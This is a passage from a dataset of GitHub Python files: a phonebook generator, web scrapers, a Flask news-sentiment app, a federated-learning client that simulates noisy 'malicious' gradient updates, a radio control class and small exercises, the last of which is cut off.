#list of possible last names\n for i in range(n): #loop to create n entries in the phonebook\n f = open(str(i)+\".txt\", 'w+') #create a text file we can write to\n name1 = random.choice(first_names) #pick a first name\n name2 = random.choice(last_names) #pick a last name\n order = random.choice([0,1]) #decide if order is \"first last\" or \"last, first\"\n if order: \n f.write(numbers[i] + '\\n' + name1 + ' ' + name2) #write to file we created earlier\n else: f.write(numbers[i] + '\\n' + name2 + ', ' + name1) #same as above\n\ndef csv_to_list(filename):\n \"\"\" creates a list of the contents of the csv\n \"\"\"\n out = []\n with open(filename, newline = '') as f: #open csv file containing names\n reader = csv.reader(f) #read the file\n for row in reader: #loop over rows of the file \n out += row #add contents of row (a name) to the final list\n return out #return list\n\ndef phone_number_generator(n):\n \"\"\" Takes as input an int n, and randomly generates \n a list of n phone numbers of various styles \n \"\"\"\n output = []\n for i in range(n):\n number = generator(random.choice(range(10))) #randomly picks a style of number\n output += [number]\n return output\n\n#helper function for phone_number_generator\ndef generator(style):\n \"\"\" outputs a number consistent with style\n specified by the input\n \"\"\"\n num = autogenerator() #calls autogenerator to create ten digit string\n if style == 0:\n return num 
#1234567890\n elif style == 1:\n return '(' + num[:3] + ')' + num[3:] #(123)4567890\n elif style == 2:\n return '(' + num[:3] + ')' + num[3:6] + '-' + num[6:] #(123)456-7890\n elif style == 3:\n return num[:3] + '.' + num[3:6] + '.' + num[6:] #123.456.7890\n elif style == 4:\n return '442-' + num[3:6] + '-' + num[6:] #442-456-7890\n elif style == 5:\n return '402 ' + num[3:] #402 4567890\n elif style == 6:\n return '(909) ' + num[3:6] + '-' + num[6:] #(909) 456-7890\n elif style == 7:\n return '442 ' + num[3:6] + ' ' + num[6:] #442 456 7890\n elif style == 8:\n return '(760)' + num[3:] #(760)4567890\n else:\n return num[3:] #4567890\n\n#helper function for generator\ndef autogenerator():\n \"\"\" creates ten digit string of numbers\n that could be a phone number\n \"\"\"\n number = '0'\n while number[0] not in '23456789': #check if valid phone number (area codes don't start with 1 or 0)\n number = ''\n for i in range(10):\n digit = random.choice(range(10)) #pick a random number\n number += str(digit) \n return number \n\ncreate_phonebook(4)","repo_name":"ScriptingBeyondCS/CS-35","sub_path":"week_0_to_2/tree_generation/phonebook_generator.py","file_name":"phonebook_generator.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14909780369","text":"#-*- coding: utf-8 -*- \n#------------------------------------- \n#version: 0.1 \n#note: finds the resources published on the 10 most recent pages of 0daydown. \n#------------------------------------- \n#------------------------------------- \n#version: 0.2 \n#note: building on v0.1, writes the output to a specified TXT file \n#------------------------------------- \n \nimport urllib.request \nimport sys \n \nfrom bs4 import BeautifulSoup \n \nold = sys.stdout #save the default system stdout \n#fp = open(\"test1.txt\",'w') \nfp = open(\"test1.txt\",'w', encoding=\"utf-8\") #encode the file as utf-8 \nsys.stdout = fp #redirect output to a file \n \nfor i in range(1,11): \n url = \"http://www.0daydown.com/page/\" + str(i) #each page's URL is formed by appending an integer \n page = urllib.request.urlopen(url) \n soup_packtpage = BeautifulSoup(page,'html.parser')\n page.close() \n num = \" The Page of: \" + str(i) #label which page the current resources belong to \n print(num) \n print(\"#\"*40) \n for article in soup_packtpage.find_all('article', class_=\"excerpt\"): #use find_all to collect all the latest resources published on the current page \n print(\"Category:\".ljust(20), end=''), print(article.header.a.next) #category \n print(\"Title:\".ljust(20), end=''), print(article.h2.string) #title \n print(\"Published_time:\".ljust(19), end=''), print(article.p.find('i', class_=\"icon-time icon12\").next) #published_time \n print(\"Note:\", end='') \n print(article.p.find_next_sibling().string) #note \n print('-'*50) \n \nfp.close() \nsys.stdout = old #restore the default system stdout \nprint(\"Done!\") \ninput() #wait for input so the console does not close immediately after running\n","repo_name":"bofk/mygit","sub_path":"python_spider/爬取网站首页简略内容.py","file_name":"爬取网站首页简略内容.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37048902613","text":"# COMMAND PATTERN -\r\nimport abc\r\nimport sys\r\nfrom io import StringIO\r\n\r\n\r\nclass Command(abc.ABC):\r\n @abc.abstractmethod\r\n def execute(self, *args, **kwargs):\r\n pass\r\n\r\n\r\nclass AddCommand(Command):\r\n def execute(self, *args, **kwargs):\r\n ll, value = args\r\n ll.append(value)\r\n\r\n\r\nclass SumCommand(Command):\r\n def execute(self, *args, **kwargs):\r\n (ll,) = args\r\n return sum(ll)\r\n\r\n\r\nclass ListCommand(Command):\r\n def execute(self, *args, **kwargs):\r\n (ll,) = args\r\n return 
ll\r\n\r\n\r\nsys.stdin = StringIO(\"\"\"Add 1\r\nAdd 2\r\nSum\r\nList\r\nAdd 4\r\nSum\r\nList\r\nEnd\r\n\"\"\"\r\n )\r\nll = []\r\n\r\nwhile True:\r\n command = input()\r\n if command == \"End\":\r\n break\r\n\r\n if command.startswith(\"Add\"):\r\n _, value_str = command.split(\" \")\r\n ll.append(int(value_str))\r\n\r\n elif command == \"List\":\r\n print(ll)\r\n\r\n elif command == \"Sum\":\r\n print(sum(ll))\r\n","repo_name":"KristianAleksiev/Python-Advanced-OOP","sub_path":"20.Design_Patterns/behavioral_command_pattern.py","file_name":"behavioral_command_pattern.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4698376109","text":"# Import packages\nimport argparse\nimport numpy as np\nimport pickle\n\nfrom socket import socket, AF_INET, SOCK_STREAM\nimport sys\nimport torch\n\nfrom data import get_dataset\nfrom net import Net_CIFAR, Net_MNIST\nimport random\n\n# Constants/configurations\nENCODING = 'utf-8' # message encoding\nBUFFER_SIZE = 2048 # fixed 2KB buffer size\nPORT = 1234 # fixed application port\nPRINT_INFO = True\n\nclass SingleModelClient:\n def compute_gradient(self):\n self.model.train()\n self.model.zero_grad()\n\n images, labels = self.dataset\n sample_indices = np.random.choice(list(range(labels.shape[0])), size=(self.num_samples_per_update, ), replace=False)\n images, labels = images[sample_indices], labels[sample_indices]\n \n outputs = self.model(images)\n loss = self.model.loss_fn(outputs, labels)\n loss.backward()\n\n self.num_compute += 1\n\n return [x.grad for x in self.model.parameters()]\n \n def update_model(self):\n # Receive updated model weights\n new_model_weights = []\n while True:\n msg = self.client.recv(BUFFER_SIZE)\n if not msg:\n print('ERROR: server disconnected')\n break\n if len(msg) != 2048:\n try:\n if msg[-6:].decode(encoding=ENCODING) == 'FINISH':\n new_model_weights.append(msg[:-6])\n break\n except:\n new_model_weights.append(msg)\n continue\n new_model_weights.append(msg)\n # Try to update model. Return True if successful.\n try:\n new_model_weights = pickle.loads(b\"\".join(new_model_weights))\n \n # Update model\n for variable, new_weights in zip(self.model.parameters(), new_model_weights):\n variable.data = new_weights # *** + NOISE\n return True\n except:\n return False\n\n def evaluate_model(self):\n self.model.eval()\n correct_samples = 0\n with torch.no_grad():\n images, labels = self.dataset\n outputs = self.model(images)\n predictions = outputs.argmax(dim=1, keepdim=True)\n \n correct_samples += predictions.eq(labels.view_as(predictions)).sum().item()\n\n acc = 100. 
* correct_samples / labels.shape[0]\n return acc\n\n def __init__(\n self,\n device_num,\n dataset_name,\n lr,\n num_samples_per_device,\n num_samples_per_update,\n sampling_method,\n server_ip,\n ):\n self.device_num = device_num\n self.dataset_name = dataset_name\n self.lr = lr\n self.num_samples_per_device = num_samples_per_device\n self.num_samples_per_update = num_samples_per_update\n self.sampling_method = sampling_method\n self.server_ip = server_ip\n self.num_compute = 0 # number of times calculating gradient\n\n # Create model\n self.model = Net_MNIST()\n\n # Create local dataset\n self.dataset = get_dataset(self.dataset_name, self.num_samples_per_device, self.sampling_method)\n\n # Connect to server\n self.client = socket(family=AF_INET, type=SOCK_STREAM)\n self.client.connect((self.server_ip, PORT))\n\ndef main():\n print(\"********** Federated Serving: devices **********\")\n\n # Parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset-name\", type=str, default='mnist', help='Dataset')\n parser.add_argument(\"--lr\", type=float, default=0.0001, help='Learning rate')\n parser.add_argument(\"--num-devices\", type=int, default=10, help='Number of devices.')\n parser.add_argument(\"--num-rounds\", type=int, default=100, help='Number of rounds.')\n parser.add_argument(\"--num-samples-per-device\", type=int, default=5000, help='Number of training samples per device.')\n parser.add_argument(\"--num-samples-per-update\", type=int, default=100, help='Number of training samples per device update.')\n parser.add_argument(\"--sampling-method\", type=str, default='iid', help='Dataset sampling method')\n parser.add_argument(\"--server-ip\", type=str, default='localhost', help='Server IP address')\n parser.add_argument(\"--enable-malicious-agent\", type=str, default='False', help='Enable malicious agents.')\n parser.add_argument(\"--num-malicious-agents\", type=int, default=1, help='Number of malicious agents.')\n parser.add_argument(\"--noise-level\", type=int, default=10, help='Multiple of random.random (0~1)')\n parser.add_argument(\"--noise-type\", type=int, default=0, help='0: white noise (random noise for each value); 1: uniform noise (one random noise value for each layer)')\n args = parser.parse_args()\n\n devices = []\n all_accuracies = []\n\n for device_num in range(args.num_devices):\n devices.append(SingleModelClient(device_num+1, args.dataset_name, args.lr, args.num_samples_per_device, args.num_samples_per_update, args.sampling_method, args.server_ip))\n print('CLIENT ({}/{}) connected to server @ {}:{}'.format(device_num+1, args.num_devices, args.server_ip, PORT))\n\n iteration = 1\n while True:\n if PRINT_INFO:\n print(\"Iteration {}\".format(iteration))\n # Compute gradients\n gradients = []\n for device_num in range(args.num_devices):\n tmp_grad = devices[device_num].compute_gradient()\n # Malicious agent: noisy gradient update\n if args.enable_malicious_agent == \"True\":\n if iteration > 40:\n # Malicious agent assignments starts from 0\n if device_num < args.num_malicious_agents:\n for layer_grad in tmp_grad:\n if args.noise_type == 0:\n layer_grad += (2 * args.noise_level * torch.rand(layer_grad.shape) - args.noise_level)\n else:\n layer_grad += (2 * args.noise_level * random.random() - args.noise_level) \n gradients.append(tmp_grad)\n if PRINT_INFO:\n print('All devices computed gradients')\n\n # Send gradients\n for device_num in range(args.num_devices):\n try:\n devices[device_num].client.send(pickle.dumps(gradients[device_num]))\n 
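# 'FINISH' below marks the end of this device's pickled gradient payload; the same sentinel is scanned for in update_model() when receiving weights.\n 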
devices[device_num].client.send('FINISH'.encode(encoding=ENCODING))\n except:\n print('Server shut down. Finished training.')\n break\n if PRINT_INFO:\n print('All devices sent gradients')\n\n # Receive model weights and update model\n for device_num in range(args.num_devices):\n update_success = devices[device_num].update_model()\n if not update_success:\n break\n if PRINT_INFO:\n print('All devices received model weights and updated model')\n\n # Accuracy evaluation\n accuracies = []\n for device_num in range(args.num_devices):\n accuracies.append(devices[device_num].evaluate_model())\n all_accuracies.append(accuracies)\n if PRINT_INFO:\n print('Mean Acc: {}%'.format(np.mean(accuracies)))\n print('All Accs: {}%'.format(accuracies))\n iteration += 1\n\n if iteration > 100:\n break\n\n all_accuracies = np.array(all_accuracies)\n with open('accuracies_1agent_1noise_ad.npy', 'wb') as outfile:\n np.save(outfile, all_accuracies)\n \nif __name__ == '__main__':\n main()","repo_name":"samhsia/CS262-FinalProject","sub_path":"src/fl_client.py","file_name":"fl_client.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29376465778","text":"import datetime\nfrom calendar import month_name\nfrom os import path\nimport logging\nimport sys\n\nfrom flask import Flask, render_template, abort, request, redirect, send_from_directory, url_for, flash, jsonify\nfrom flask.json import dumps, loads\n\nimport analysis.sentiment_analysis as sent\nfrom analysis import chart_data\nfrom analysis.statistics import SimpleWordStatistics\nfrom db import mongo_db as db\nfrom utils.settings import APP_BACKUPS, APP_LOGS\nfrom utils.journals import JOURNALS\nimport fetcher\n\nlog_level = logging.INFO\nlogging.basicConfig(\n filename=path.join(APP_LOGS, \"app.log\"),\n level=log_level,\n format='%(asctime)s %(levelname)s %(name)s %(message)s'\n)\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(log_level)\nlogger.addHandler(handler)\nlogger.info(\"Successfully configured logger\")\n\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017\n\n\n# TODO find better way to link journals to MongoDB\n\n\ndef sort_journals_by_display_key(journal):\n return journal[1][\"Display\"]\n\napp = Flask(__name__)\napp.secret_key = \"secret_key\"\napp.config.from_object(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return render_start_page()\n\n\n@app.route(\"/fetch/<coll_name>\")\ndef fetch(coll_name):\n if coll_name not in JOURNALS \\\n or not JOURNALS[coll_name][\"Crawler\"] \\\n or not JOURNALS[coll_name][\"BaseLink\"] \\\n or not JOURNALS[coll_name][\"Sections\"] \\\n or not JOURNALS[coll_name][\"Indexer\"]:\n logger.error(f\"configuration of collection {coll_name} seems not to be complete. 
Cannot fetch articles.\")\n abort(501)\n if fetcher.get_state(coll_name) is fetcher.FetcherState.ready:\n fetcher.start_fetch(coll_name)\n flash(f\"fetching of journal {coll_name} has started\", \"success\")\n else:\n flash(f\"server is already fetching stories for {coll_name}\", \"error\")\n return render_start_page()\n\n\n@app.route('/task_info/')\ndef task_info(coll_name):\n state_str = \"uninitialized\"\n st = fetcher.get_state(coll_name)\n if st:\n state_str = st.name\n return jsonify(\n state=state_str,\n fetched=fetcher.get_fetched_amount(coll_name),\n total=fetcher.get_total_stories(coll_name),\n recentAction=fetcher.get_recent_action(coll_name),\n progress=fetcher.get_progress(coll_name)\n )\n\n\ndef render_start_page():\n for coll_name, journal in JOURNALS.items():\n journal[\"article_count\"] = db.get_count(coll_name)\n return render_template(\"index.html\",\n journals=sorted(JOURNALS.items(), key=sort_journals_by_display_key))\n\n\ndef sort_for_show_journal(story):\n return story[\"text_sent\"]\n\n\n@app.route(\"/show_journal/\")\ndef show_journal(coll_name):\n journal = JOURNALS[coll_name]\n if not journal: abort(501)\n journal_name = journal[\"Display\"]\n section_chart = chart_data.article_amount_per_section(coll_name)\n month_chart = chart_data.article_amount_per_month(coll_name)\n month_sent_chart = chart_data.avg_sent_per_month(coll_name)\n section_sent_chart = chart_data.avg_sent_per_section(coll_name)\n\n return render_template(\n \"show_journal.html\",\n stories=sorted(list(db.find(coll_name)), key=sort_for_show_journal),\n journal_name=journal_name,\n section_chart=section_chart,\n month_chart=month_chart,\n month_sent_chart=month_sent_chart,\n section_sent_chart=section_sent_chart\n )\n\n\n@app.route(\"/most_common/\")\ndef most_common(coll_name):\n word_stat = SimpleWordStatistics()\n word_stat.feed_from_db(db.find(coll_name))\n result = [(word, amt, sent.sent_for_normalized(word)) for word, amt in word_stat.get_top_frequent(100)]\n return render_template(\"most_common.html\", result=result)\n\n\n@app.route(\"/most_common_by_month/\")\ndef most_common_by_month(coll_name):\n word_stat = SimpleWordStatistics()\n result = [] # list of dict (month_label, month_result)\n for year, month, docs in db.group_by_month(coll_name):\n month_label = f\"{month_name[month]} {year}\"\n word_stat.feed_from_db(docs)\n month_result = [(word, amt, sent.sent_for_normalized(word)) for word, amt in word_stat.get_top_frequent(100)]\n word_stat.clear()\n result.append((month_label, month_result))\n return render_template(\"most_common_by_month.html\", result=result)\n\n\n@app.route(\"/term_analysis/\")\ndef term_analysis():\n term = request.args.get(\"term\")\n charts = []\n for coll_name, journal in JOURNALS.items():\n if not db.is_empty(coll_name):\n idf_month_chart = chart_data.idf_per_month(term, coll_name)\n idf_section_chart = chart_data.idf_per_section(term, coll_name)\n sent_chart = chart_data.avg_sent_per_month(coll_name, term)\n charts.append({\n \"journal_name\": journal[\"Display\"],\n \"idf_month_chart\": idf_month_chart,\n \"idf_section_chart\": idf_section_chart,\n \"sent_chart\": sent_chart\n })\n return render_template(\"term_analysis.html\", term=term, charts=charts)\n\n\n@app.route(\"/json_backup/\")\ndef json_backup(coll_name):\n docs = [doc for doc in db.select_for_backup(coll_name)]\n filename = f\"backup_{coll_name}.json\"\n backup_path = path.join(APP_BACKUPS, filename)\n content = dumps(docs)\n with open(backup_path, \"w\") as target:\n target.write(content)\n return 
send_from_directory(APP_BACKUPS, filename)\n\n\n@app.route(\"/load_json_form/<coll_name>\")\ndef load_json_form(coll_name):\n return render_template(\"load_articles_form.html\", coll_name=coll_name)\n\n\n@app.route(\"/load_from_json\", methods=[\"post\"])\ndef load_from_json():\n coll_name = None\n for journal in JOURNALS.keys():\n if f\"json_file_{journal}\" in request.files:\n coll_name = journal\n if not coll_name:\n abort(418) # i'm a teapot\n file = request.files[f\"json_file_{coll_name}\"]\n content = file.read()\n docs = loads(content)\n\n # turn published dates back to datetime \"Sun, 05 Feb 2017 14:59:00 GMT\"\n for doc in docs:\n pub_date = datetime.datetime.strptime(doc[\"published\"], \"%a, %d %b %Y %H:%M:%S GMT\")\n doc[\"published\"] = pub_date\n\n db.insert_many(coll_name, docs)\n return redirect(url_for(\"index\"))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"RomanKuratli/NewsCrawler","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33071899011","text":"import struct\nimport zmq\n\nclass ProtocolError(Exception):\n pass\n\nclass CtrlPort:\n\n _CMD_REQ_SET_FREQ = 100\n _CMD_REQ_SET_GAIN = 101\n _CMD_REQ_SET_ANT = 102\n\n _CMD_REP_OK = 200\n _CMD_REP_BAD = 400\n\n def __init__(self, host, port=21233):\n\n self._endpoint = 'tcp://%s:%d' %(host, port)\n\n self._context = zmq.Context()\n self._socket = self._context.socket(zmq.REQ)\n self._socket.connect(self._endpoint)\n\n def setFreq(self, freq):\n\n # Form and send the request.\n req = struct.pack('hf', self._CMD_REQ_SET_FREQ, freq)\n self._socket.send(req)\n\n # Get the reply \n rep = self._socket.recv()\n code, = struct.unpack('h', rep)\n\n # Check the result\n if (code != self._CMD_REP_OK):\n raise ProtocolError('CMD_REP_BAD: Set frequency %f.' %(freq))\n\n def setAnt(self, ant):\n\n # Form and send the request.\n req = struct.pack('hI', self._CMD_REQ_SET_ANT, ant)\n self._socket.send(req)\n\n # Get the reply \n rep = self._socket.recv()\n code, = struct.unpack('h', rep)\n\n # Check the result\n if (code != self._CMD_REP_OK):\n raise ProtocolError('CMD_REP_BAD: Set antenna %d.' %(ant))\n\n def setGain(self, gain):\n\n # Form and send the request.\n req = struct.pack('hf', self._CMD_REQ_SET_GAIN, gain)\n self._socket.send(req)\n\n # Get the reply \n rep = self._socket.recv()\n code, = struct.unpack('h', rep)\n\n # Check the result\n if (code != self._CMD_REP_OK):\n raise ProtocolError('CMD_REP_BAD: Set gain %f.' 
%(gain))\n\n","repo_name":"nsbruce/usrp-emi-prototype","sub_path":"py-emi/CtrlPort.py","file_name":"CtrlPort.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26059779088","text":"import sys\nsys.stdin = open('input.txt')\n\ntest_case = int(input())\nfor tc in range(1, test_case+1):\n N = int(input())\n arr = []\n for i in range(N):\n alphabet, num = input().split()\n arr.append(alphabet*int(num))\n result = ''\n for i in range(len(arr)):\n result += arr[i]\n\n print(f'#{tc}')\n for i in range((len(result)//10)+1):\n for j in range(i*10, (i+1)*10):\n print(result[j], end='')\n if j == len(result)-1:\n break\n print()","repo_name":"SWan9710/algorithm","sub_path":"algorithm/02_Extra_problem/1946_zip/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25672593938","text":"import unittest\nfrom os import path\nfrom src.data import HouseData\nimport json\n\n\nclass TestParse(unittest.TestCase):\n\n def test_parse_house_data(self):\n with open(path.join('test', 'test.html'), 'r') as f:\n html = f.read()\n all_house_data = HouseData.parse(html)\n s = json.dumps(all_house_data, ensure_ascii=False,\n indent=4, cls=HouseData.Encoder)\n try:\n with open(path.join('test', 'test_all_house_data.json'), 'r') as f:\n assert (f.read() == s)\n except FileNotFoundError:\n with open(path.join('test', 'test_all_house_data.json'), 'w') as f:\n f.write(s)\n\n def test_parse_project_rule(self):\n with open(path.join('test', 'test_project_rule.json'), 'r') as f:\n json_object = json.loads(f.read())\n house_data = HouseData()\n house_data.parse_project_rule(json_object['message'])\n","repo_name":"LaPluses/chengdu_house_spider_2","sub_path":"test/house_data_parse_test.py","file_name":"house_data_parse_test.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12838289291","text":"# -*- coding: utf-8 -*-\nimport sys\nimport uuid\nimport requests\nimport hashlib\nimport time\nfrom imp import reload\nfrom config import youdao\n\n\nYOUDAO_URL = youdao['url']\nAPP_KEY = youdao['app_id']\nAPP_SECRET = youdao['app_secret']\n\n\ndef changeUpper(text: str, index: int) -> str:\n new_text = ''\n for i in range(len(text)):\n if i == index:\n new_text += text[i].upper()\n else:\n new_text += text[i]\n return new_text\n\n\ndef encrypt(signStr):\n hash_algorithm = hashlib.sha256()\n hash_algorithm.update(signStr.encode('utf-8'))\n return hash_algorithm.hexdigest()\n\n\ndef truncate(q):\n if q is None:\n return None\n size = len(q)\n return q if size <= 20 else q[0:10] + str(size) + q[size - 10:size]\n\n\ndef do_request(data):\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n return requests.post(YOUDAO_URL, data=data, headers=headers)\n\n\ndef connect(text, source, target):\n # q = input(\"Text to be translated: \")\n q = text\n\n data = {}\n data['from'] = source\n data['to'] = target\n # data['from'] = 'en'\n # data['to'] = 'zh-CHS'\n data['signType'] = 'v3'\n curtime = str(int(time.time()))\n data['curtime'] = curtime\n salt = str(uuid.uuid1())\n signStr = APP_KEY + truncate(q) + salt + curtime + APP_SECRET\n sign = encrypt(signStr)\n data['appKey'] = APP_KEY\n data['q'] = q\n data['salt'] = salt\n data['sign'] = sign\n # data['vocabId'] = \"your user vocabulary ID\"\n\n response = 
do_request(data)\n contentType = response.headers['Content-Type']\n if contentType == \"audio/mp3\":\n millis = int(round(time.time() * 1000))\n filePath = \"voice/\" + str(millis) + \".mp3\"\n fo = open(filePath, 'wb')\n fo.write(response.content)\n fo.close()\n else:\n print(response.content.decode())\n\n res = response.content.decode()\n try:\n res = eval(res)\n except NameError:\n index = res.find('\\\"isWord\\\":') + 9\n print(index)\n res = changeUpper(res, index)\n res = eval(res)\n return res\n\n\nif __name__ == '__main__':\n text = input('text: ')\n connect(text, 'en', 'zh')\n","repo_name":"RickWayne1125/EngBot","sub_path":"backend/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29456573982","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport seaborn as sns\nimport statsmodels.api as stat\n\nsns.set()\npath= '/home/shamik/PycharmProjects/term paper/data'\ndata= pd.read_csv(f'{path}/final_output.csv')\ngdp= preprocessing.scale(data['per capita GDP'])\nunemployment= preprocessing.scale(data['unemployment rate'])\ngini= preprocessing.scale(data['gini index'])\n\nx0 = preprocessing.scale(data['unemployment rate'])\nx1 = preprocessing.scale(data['gini index'])\ny= preprocessing.scale(data['per capita GDP'])\n\nconstant0 = stat.add_constant(x0)\nconstant1 = stat.add_constant(x1)\n\nmodel0= stat.OLS(y, x0).fit()\nmodel1= stat.OLS(y, x1).fit()\n\n\nsns.scatterplot(gdp, unemployment)\nsns.lineplot(y, model0.predict(y), color='red')\nplt.ylabel('unemployment rate')\nplt.xlabel('per capita GDP')\nplt.show()\n\nsns.scatterplot(gdp, gini)\nsns.lineplot(y, model1.predict(y), color='red')\nplt.ylabel('gini index')\nplt.xlabel('per capita GDP')\nplt.show()","repo_name":"Shamik69/term-paper","sub_path":"code/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"512335383","text":"# Program Of Gambler\nimport random\nstake=int(input(\"Enter the stake\\n\"))\ngoal=int(input(\"Enter the goal\\n\"))\ntrials=int(input(\"Enter the trials\\n\"))\nbets=0\nwins=0\n# Traverse from 0 to trials\nfor i in range(trials):\n cash=stake # Initialize Stake to Cash\n while cash > 0 and cash < goal:\n bets=bets+1\n if random.random() < 0.5:\n cash = cash + 1\n else:\n cash = cash - 1\n if cash == goal:\n wins=wins + 1 #If cash reached to goal then increment wins\nx=100*wins/trials\na=100-x\n# Printing percentage of Game won,loss.\nprint(str(wins) + \" wins of \" + str(trials))\nprint(\"Percent of games won = \" + str(x))\nprint(\"Percent of game loss=\"+str(a))\nprint(\"Avg # bets = \" + str(bets / trials))\n\n","repo_name":"Ibbukanch/Python-programs","sub_path":"pythonprograms/Functional/Gambler.py","file_name":"Gambler.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41272700174","text":"#!/usr/bin/env python3\n\nimport string\nimport re\nimport json\nimport argparse\nimport numpy as np\nimport os.path as op\nfrom wiktionaryparser import WiktionaryParser\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\n\n\ndef wiktionary_definition(wordlist):\n \"\"\"Get definition for wordlist from Wiktionary.\n\n Parameters\n ----------\n 
wordlist : dict\n Dictionary whose keys are words to check from wiktionary. Values are\n ignored.\n\n Returns\n -------\n wordlist : dict\n The input dictionary, with a wiktionary entry added (entry is a list of\n dictionaries)\n\n \"\"\"\n parser = WiktionaryParser()\n parser.set_default_language('Yiddish')\n parser.include_relation('derived terms')\n parser.include_relation('alternative forms')\n parser.include_relation('see also')\n for word, defs in wordlist.items():\n print(f'Looking up {word} from Wiktionary')\n wikt = parser.fetch(word)\n for wi in wikt:\n wi['transliteration'] = []\n # remove the audio, which is never there anyway\n wi['pronunciations'] = wi['pronunciations']['text']\n for defi in wi['definitions']:\n txt = defi.pop('text')\n defi['text'] = txt[1:]\n txt = txt[0]\n defi['lexeme'] = txt.split('•')[0].strip()\n wi['transliteration'].append(txt.split('•')[1].split(')')[0].replace('(', '').strip())\n if u'\\xa0' in txt:\n defi['gender'] = txt.split(u'\\xa0')[1].split(',')[0]\n else:\n defi['gender'] = None\n if 'plural' in txt:\n defi['plural'] = txt.split('plural')[1].strip()\n else:\n defi['plural'] = None\n if 'participle' in txt:\n defi['participle'] = txt.split('participle')[1].replace('))', ')').strip()\n else:\n defi['participle'] = None\n if len(set(wi['transliteration'])) == 1:\n wi['transliteration'] = wi['transliteration'][0]\n wordlist[word]['wiktionary'] = wikt\n return wordlist\n\n\ndef _get_word_from_kentucky(browser, word):\n \"\"\"Construct dictionary with definition for a single word.\n\n when finding a match:\n - it will be a span/goodmatch\n - can't assume it will be the first / last / anything\n - can't assume it will be on the outside list\n - can't assume it will be the only word in the span\n - entry will have the stem in the lexeme, if there are multiple, take all.\n - if there isn't an entry where the stem is in the lexeme: take all goodmatches\n\n Parameters\n ----------\n browser : selenium.webdriver\n Browser opened to the Kentucky Yiddish dictionary page.\n word : str\n Word to get the definition for\n\n Returns\n -------\n definition : dict\n Dictionary containing all info scraped from the dictionary.\n\n \"\"\"\n print(f'Looking up {word} from the Kentucky dictionary')\n browser.find_element('name', 'base').send_keys(word + Keys.RETURN)\n soup = BeautifulSoup(browser.page_source, 'html.parser')\n # Get transliteration\n transl = soup.find('span', 'grammar')\n assert soup.find(string='Converting ') == transl.previous_sibling.previous_sibling.previous_sibling, \"Can't find transliteration!\"\n stem = soup.find('span', 'goodmatch')\n try:\n assert soup.find(string='\\nThe base word for ') == stem.previous_sibling.previous_sibling.previous_sibling, \"Can't find transliteration!\"\n except AttributeError:\n return []\n ky = {'transliteration': transl.text, 'stem': stem.text}\n # sometimes the stem is multiple words for some reason\n stem = stem.text.split(' ')[0]\n # azoy words[11] has many examples, which I'd like -- they're all in the\n # lexeme but don't start the entry. 
amol words[5] is not in the lexeme at\n # all, want to not grab the entry in goodmatches so we go to the else\n # statement\n goodmatches = [gm for gm in soup.find('ul').find_all('span', 'goodmatch')\n if stem in gm.parent.text]\n goodmatches = [gm for gm in goodmatches if 'class' in gm.parent.attrs and\n 'lexeme' in gm.parent.attrs['class']]\n if len(goodmatches) == 0:\n entries = [gm.parent for gm in\n soup.find('ul').find_all('span', 'goodmatch')]\n else:\n entries = [gm.parent.parent for gm in goodmatches]\n lexs = [entr.find('span', 'lexeme').text.replace('(', '').strip()\n for entr in entries]\n entries = [entr for entr, lex in zip(entries, lexs) if stem in lex]\n lexemes = []\n parts_of_speech = []\n plurals = []\n participles = []\n genders = []\n definitions = []\n for entr in entries:\n try:\n lex = entr.find('span', 'lexeme').text.replace('(', '').strip()\n except AttributeError:\n continue\n lexemes.append(lex)\n try:\n pos = entr.find('span', 'grammar').text.split(',')[0]\n if not pos.startswith('plural') and not pos.startswith('gender'):\n parts_of_speech.append(pos.strip())\n else:\n parts_of_speech.append(None)\n except AttributeError:\n parts_of_speech.append(None)\n try:\n plural = entr.find('span', 'grammar')\n if not plural.text.startswith('plural'):\n plural.text.split(',')[1]\n plural_text = plural.next_sibling.split(',')[0].replace('(','').strip()\n if plural.next_sibling.next_sibling.attrs['class'] == ['hebrew']:\n plural_text += f' ({plural.next_sibling.next_sibling.text})'\n plurals.append(plural_text)\n except (IndexError, AttributeError):\n plurals.append(None)\n part = entr.find('span', string='participle')\n if part is not None:\n participles.append(part.next_sibling.text.replace(',', '').strip())\n else:\n participles.append(None)\n gdr = entr.find('span', 'grammar', string=re.compile(r'gender.*'))\n if 